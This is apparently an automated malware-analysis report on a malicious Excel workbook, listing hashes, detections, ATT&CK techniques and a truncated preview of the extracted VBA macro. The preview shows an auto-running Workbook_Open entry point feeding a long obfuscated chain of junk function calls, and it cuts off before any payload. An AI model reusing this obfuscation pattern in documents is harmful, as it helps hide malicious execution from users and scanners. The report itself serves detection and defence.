Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18f461b274aa21fc…

MALICIOUS

Office (OLE)

436.5 KB Created: 2017-07-30 22:24:35 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: b012778c8d721f7cc4fe8147a4e62766 SHA-1: 15c6565ad447d78ab9ddc78ed9553a3df08ed918 SHA-256: 18f461b274aa21fc27491173968ebe87517795f24732ce977ccea5f627b116f9
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is an Excel macro-enabled workbook containing a Workbook_Open macro that executes obfuscated VBA code. The presence of a Shell() call within the VBA code strongly suggests that it is designed to download and execute a secondary payload. The ClamAV detection name 'Xls.Malware.Valyria-10036514-0' further supports its malicious nature.

Heuristics 5

  • ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 150678 bytes
SHA-256: cbd67b2fe3c9099b7571b7bf2b3b5d53c0aea67063e53491e82223e0adb7ca46
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Trueseeker1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Trueseeker"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub WoRkBOOk_OPEN(): Call lrxfikrcmzhvxc: End Sub
Static Sub lrxfikrcmzhvxc()
Call ygqskkajezsgwv
End Sub
Function ygqskkajezsgwv() As Double
Call pegceghvvucalt
End Function
Static Function pegceghvvucalt() As Integer
Call hiwcsbxglkjuok
End Function
Private Function hiwcsbxglkjuok() As Double
Call rljxjeybprakdn
End Function
Sub rljxjeybprakdn()
Call suqgjpexxttpxf
End Sub
Static Function suqgjpexxttpxf() As Boolean
Call gpijfpxdpozbkq
End Function
Private Sub gpijfpxdpozbkq()
Call jcrgozbgfcsqps
End Sub
Private Sub jcrgozbgfcsqps()
Call zweczwjmoldzsf
End Sub
Private Sub zweczwjmoldzsf()
Call vldrmnxqblhxcd
End Sub
Function vldrmnxqblhxcd() As Long
Call fcxmkqdrthkdqc
End Function
Static Sub fcxmkqdrthkdqc()
Call mpxxywkstwmlzh
End Sub
Sub mpxxywkstwmlzh()
Call plodtgkbxevnom
End Sub
Static Sub plodtgkbxevnom()
Call ztbpfjuwaghfrj
End Sub
Private Function ztbpfjuwaghfrj() As Byte
Call msbltjyjhbifbe
End Function
Private Sub msbltjyjhbifbe()
Call yerjnkijspugpm
End Sub
Static Function yerjnkijspugpm() As Date
Call grhrcppdbyxbsa
End Function
Function grhrcppdbyxbsa() As String
Call wsnfhjaqmkghcp
End Function
Static Function wsnfhjaqmkghcp() As Long
Call foptynrytgdakx
End Function
Sub foptynrytgdakx()
Call wzvgxkdxouyuei
End Sub
Static Function wzvgxkdxouyuei() As String
Call xzugkvonibblow
End Function
Static Sub xzugkvonibblow()
Call rgnuhpdfgehpcy
End Sub
Static Sub rgnuhpdfgehpcy()
Call wyrbzwggnzabkv
End Sub
Sub wyrbzwggnzabkv()
Call rjmcepvesoepji
End Sub
Private Sub rjmcepvesoepji()
Call flqlbnzyhvfzdo
End Sub
Function flqlbnzyhvfzdo() As Object
Call txbekmxykwvxix
End Function
Function txbekmxykwvxix() As Variant
Call vlgeeymurtkcph
End Function
Private Function vlgeeymurtkcph() As Single
Call uvstolerhizktx
End Function
Private Sub uvstolerhizktx()
Call vzzmvxzoqowoyv
End Sub
Static Function vzzmvxzoqowoyv() As Byte
Call xfycciudjrvfwc
End Function
Sub xfycciudjrvfwc()
Call cbkcnqimfmieai
End Sub
Sub cbkcnqimfmieai()
Call gkmgdachfbggjb
End Sub
Private Function gkmgdachfbggjb() As Boolean
Call ngtadgepujzcci
End Function
Private Sub ngtadgepujzcci()
Call jqjvywinslinrx
End Sub
Private Sub jqjvywinslinrx()
Call rucwzbuiefuhrz
End Sub
Function rucwzbuiefuhrz() As Object
Call zctovgqdotcbfu
End Function
Private Function zctovgqdotcbfu() As Currency
Call hvnijljacywuck
End Function
Private Sub hvnijljacywuck()
Call szsabninqaoxkx
End Sub
Static Function szsabninqaoxkx() As Date
Call wzmufwhdcvwkkn
End Function
Static Function wzmufwhdcvwkkn() As Date
Call ihuagxgwxknydl
End Function
Function ihuagxgwxknydl() As Double
Call phjnzetlbsaisc
End Function
Static Function phjnzetlbsaisc() As Byte
Call uqflflcgutdgqw
End Function
Function uqflflcgutdgqw() As Double
Call vmbxkxnqgohmpz
End Function
Private Sub vmbxkxnqgohmpz()
Call muzrqupildiuna
End Sub
Private Sub muzrqupildiuna()
Call fvsotoubklrxnj
End Sub
Private Function fvsotoubklrxnj() As Variant
Call yydjxhzltodofb
End Function
Static Function yydjxhzltodofb() As Boolean
Call ccfwtqjiuhfoab
End Function
Static Function ccfwtqjiuhfoab() As Object
Call xjtdfinzkxppde
End Function
Function xjtdfinzkxppde() As Single
Call wcmccwzcofulrx
End Function
Static Function wcmccwzcofulrx() As Long
Call sutkhoyorgsxwe
End Function
Sub sutkhoyorgsxwe()
Call kkshqijmdcopuj
End Sub
Sub kkshqijmdcopuj()
Call r
... (truncated)